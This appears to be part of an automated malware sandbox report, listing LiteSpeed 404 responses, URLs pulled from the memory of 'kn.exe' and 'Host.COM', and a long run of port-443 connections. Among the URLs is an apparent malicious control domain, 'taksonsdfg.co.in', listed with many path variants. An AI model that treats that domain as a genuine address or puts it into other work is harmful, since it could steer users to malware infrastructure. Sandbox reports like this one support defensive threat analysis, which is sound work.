Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:17 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:18 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:19 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:31:20 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Source: kn.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.0000000002892000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3054244908.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002899000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: kn.exe	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/
Source: Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/./
Source: Host.COM, 00000009.00000002.3052727983.000000002501D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/25
Source: Host.COM, 00000009.00000003.2455294317.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3052727983.0000000025000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx
Source: Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx&/
Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx/;
Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxB8
Source: Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxN/c$
Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV
Source: Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV/K$
Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxo/
Source: Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxv/
Source: Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx~
Source: Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/6/
Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/H
Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/Z
Source: Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/f/
Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/n/C$
Source: Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1935087068.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/x
Source: Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in/~
Source: Host.COM, 00000009.00000002.3032889978.00000000008A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://taksonsdfg.co.in:443/34243456dfgd/255_Znrgbbhcbyx;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50212
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50214
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50213
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 50196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50183
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50190
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
